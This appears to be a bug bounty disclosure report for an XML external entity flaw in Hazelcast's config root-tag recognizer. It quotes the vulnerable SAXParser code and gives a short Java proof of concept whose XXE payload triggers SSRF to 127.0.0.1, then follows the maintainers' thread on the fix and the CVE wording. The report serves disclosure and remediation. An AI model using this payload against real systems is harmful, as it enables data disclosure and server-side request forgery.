Improper Restriction of XML External Entity Reference in hazelcast/hazelcast

Valid

Reported on

Jan 16th 2022


Description

The AbstractXmlConfigRootTagRecognizer() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65

        public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
        this.expectedRootNode = expectedRootNode;
        SAXParserFactory factory = SAXParserFactory.newInstance();
        saxParser = factory.newSAXParser();
    }

    @Override
    public boolean isRecognized(ConfigStream configStream) throws Exception {
        MemberHandler memberHandler = new MemberHandler(expectedRootNode);
        try {
            saxParser.parse(configStream, memberHandler);
        }

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the hazelcast team within 24 hours. 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
Josef Cacek validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Cacek
2 years ago

Maintainer


The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407

Josef Cacek
2 years ago

Maintainer


Even the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.

Jamie Slome
2 years ago

With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️

Josef Cacek
2 years ago

Maintainer


The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.

Jamie Slome
2 years ago

Okay, thanks for the update Josef and that makes sense.

We will confirm the fix for this report once you are ready to publish the report!

Josef Cacek marked this as fixed in 5.1 with commit 4d6b66 2 years ago
The fix bounty has been dropped
Josef Cacek
2 years ago

Maintainer


@jamieslome, how we can change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."

Jamie Slome
2 years ago

@kwart - I have updated the CVE for you 👍

https://github.com/CVEProject/cvelist/pull/5209/files

The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.

Josef Cacek
2 years ago

Maintainer


Thanks, Jamie.

to join this conversation